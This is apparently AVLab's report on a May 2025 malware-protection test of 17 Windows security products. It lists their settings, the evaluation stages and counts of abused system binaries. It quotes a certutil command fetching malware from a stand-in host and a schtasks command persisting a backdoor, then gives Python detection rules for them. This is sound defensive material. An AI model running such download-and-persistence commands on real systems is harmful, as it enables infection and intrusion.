The May edition of Advanced In-The-Wild Malware Test on Internet samples

18 June 2025

Almost half of the year is behind us, so we are wrapping up the 3rd edition of the Advanced In-The-Wild Malware Test – a long-term study aimed at identifying the best comprehensive security solutions for protecting Windows systems. In May, we tested as many as 17 solutions for their ability to detect and neutralize threats. We obtain the URLs leading to malicious content from various sources, including commercial and free feeds, instant messaging, Internet forums and honeypots.

Our tests comply with the guidelines of the Anti-Malware Testing Standards Organization. Details about the test are available at this website as well as in our methodology.

What solutions did we test in May 2025?

What settings do we use?

Although we try to avoid PUP and PUA (potentially unwanted application) samples in our tests, we recommend enabling protection against such threats – we also always activate it ourselves.

When setting up security software, we make sure to use a dedicated browser extension, if possible. In addition, we set the program to automatically respond to incidents by blocking, removing or fixing them.

Based on many tests to date, we note that the default settings are usually good, but do not always provide the optimal level of protection. Therefore, for the sake of full transparency, we report on all configuration modifications – both those designed to increase effectiveness and those required by the software developer.

Solutions for Enterprise

Emsisoft Enterprise Security + EDR: Default settings + automatic PUP repair + EDR + Rollback + browser protection

mks_vir Endpoint Security + EDR: Extended http/https scanning enabled + browser protection + EDR

ThreatDown Endpoint Protection + EDR: Default settings + browser protection + EDR

WatchGuard Endpoint Security: Default settings + browser protection

Xcitium ZeroThreat Advanced + EDR: Preset policy “Windows – Secure Profile v.8.1” + HIPS default action on “Block requests” + EDR enabled

Solutions for Consumers and Small Business

Avast Free Antivirus: Default settings + automatic PUP repair + browser protection

Bitdefender Total Protection: Default settings + browser protection

Comodo Internet Security 2025: Browser protection + automatic blocking for sandbox

Eset Smart Security: Default settings + browser protection

F-Secure Total: Default settings + browser protection

G Data Internet Security: Default settings + browser protection

Malwarebytes Premium: Default settings + browser protection

McAfee Total Protection: Default settings + browser protection

Microsoft Defender: Default settings (does not integrate with Firefox)

Norton Antivirus Plus: Default settings + browser protection

Webroot Antivirus: Default settings + browser protection

ZoneAlarm Extreme Security NextGen: Default settings + browser protection + Anti-Keylogger enabled

Advanced In-The-Wild Malware Test

How do we evaluate and how long does it last?

We conduct 6 editions of the test per calendar year, which culminate in a grand summary that determines the awards for the best antivirus solutions.

In each edition, we evaluate the effectiveness of the tested security products for companies and for consumers considering 3 key parameters:

  1. PRE_EXECUTION – we assess whether the threat has been identified and blocked at an early stage, before it has even run. This may include blocking a website, a downloaded file, or an attempt to write or access it.

  2. POST_EXECUTION – we check whether the malware that has been downloaded and run on the system has been recognized and stopped during a more advanced analysis. This stage simulates the most dangerous scenario – a 0-day attack, in which the malware has already managed to start running.

  3. REMEDIATION TIME – we measure the time that elapses from the moment a threat appears on the system to its complete removal and remediation of the incident. This parameter is closely related to the previous ones and allows us to assess how quickly and effectively the software handles the elimination of threats.

Malware often uses native Windows tools and components (so-called LOLBins – Living off the Land Binaries) to perform unauthorized operations without raising suspicion. Based on the analyzed logs, the following numbers of cases were identified in which legitimate system processes were involved in malware activity:

  1. schtasks.exe, 4974
  2. rundll32.exe, 3531
  3. certutil.exe, 2154
  4. powershell.exe, 1271
  5. consent.exe, 881
  6. csc.exe, 455
  7. wmiprvse.exe, 302
  8. ping.exe, 263
  9. reg.exe, 181
  10. mshta.exe, 145
  11. wscript.exe, 127
  12. wmic.exe, 122
  13. regsvr32.exe, 70
  14. control.exe, 42
  15. conhost.exe, 31
  16. net1.exe, 28
  17. vssadmin.exe, 26
  18. iexplore.exe, 8
  19. cscript.exe, 4

certutil.exe process – 2154 occurrences, for example:

    certutil -urlcache -split -f http://example.com/malware.exe malware.exe

schtasks.exe process – 4974 occurrences in the tested systems, for example:

    schtasks /create /tn "Updater" /tr "C:\backdoor.exe" /sc minute /mo 5 /f
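The two command lines above are exactly the kind of pattern a detection rule can key on. The following added example (written for this article, not AVLab's own tooling) runs simple command-line rules for certutil.exe and schtasks.exe over a handful of constructed process-creation records; the event fields and the sample timestamps are assumptions, not data from the test.

```python
import re

# Constructed process-creation records (assumed field names; not AVLab telemetry).
SAMPLE_EVENTS = [
    {"ts": "2025-05-12T10:14:02Z", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.com/malware.exe malware.exe"},
    {"ts": "2025-05-12T10:14:09Z", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn "Updater" /tr "C:\\backdoor.exe" /sc minute /mo 5 /f'},
    {"ts": "2025-05-12T10:15:00Z", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify cert.cer"},            # benign use, must not alert
    {"ts": "2025-05-12T10:16:30Z", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /query /tn Updater"},          # benign use, must not alert
]

# Each rule: (LOLBin image name, regex over the command line, description).
RULES = [
    ("certutil.exe", re.compile(r"-urlcache\b.*\bhttps?://", re.I),
     "certutil used as a downloader (-urlcache with a URL)"),
    ("schtasks.exe", re.compile(r"/create\b.*\s/sc\s+minute\b", re.I),
     "scheduled task created with a minute-level trigger"),
    ("schtasks.exe",
     re.compile(r'/create\b.*\s/tr\s+"?[A-Za-z]:\\(?!Windows\\|Program Files)', re.I),
     "scheduled task runs a binary outside Windows/Program Files"),
]

def image_name(path):
    """Last path component, lower-cased, so rules match regardless of directory."""
    return path.rsplit("\\", 1)[-1].lower()

def match_event(event):
    """Return the descriptions of every rule that fires on a single event."""
    name = image_name(event["image"])
    return [desc for binary, rx, desc in RULES
            if binary == name and rx.search(event["cmdline"])]

def scan(events):
    """Return alerts as (timestamp, binary, description) tuples, one per rule hit."""
    return [(ev["ts"], image_name(ev["image"]), desc)
            for ev in events for desc in match_event(ev)]

def count_by_binary(alerts):
    """Aggregate alerts per LOLBin, mirroring the per-process counts in the list above."""
    counts = {}
    for _, binary, _ in alerts:
        counts[binary] = counts.get(binary, 0) + 1
    return counts

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The benign certutil and schtasks invocations produce no alert, which is the property such rules need if they are to run against the thousands of occurrences reported above.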
				
			
[Chart: AVLab results in May 2025]

Some security solutions failed to detect at least one threat sample. While a single incident may seem statistically insignificant, it may in fact represent a previously unknown 0-day threat. This type of attack is capable of bypassing the protection mechanisms of the operating system and the detection engines of the installed antivirus software, and can lead to system infection, data encryption, information theft or other unwanted activity.

About the Advanced In-The-Wild Malware Test series

The test is conducted periodically six times a year and focuses on evaluating the effectiveness of security solutions in detecting and blocking malware running in a Windows 11 environment.

The purpose of the test is to identify the strengths and weaknesses of the tested solutions in detecting and neutralizing actively occurring threats in the environment. The test is also accompanied by the collection of telemetry data to analyze the current threat landscape and the techniques most commonly used by cybercriminals in targeted and mass attacks.


About AVLab Cybersecurity Foundation

AVLab Cybersecurity Foundation is a respected organization working within AMTSO (Anti-Malware Testing Standards Organization) and the Microsoft Virus Initiative (MVI). It specializes in enhancing digital security through detailed testing and analysis of security solutions. AVLab’s experts use advanced and realistic methods to evaluate the effectiveness of security software under real-world threat conditions. The organization regularly updates its testing protocols to deliver reliable and valuable cybersecurity reports, supporting both individual users and businesses in making informed decisions to protect their systems.
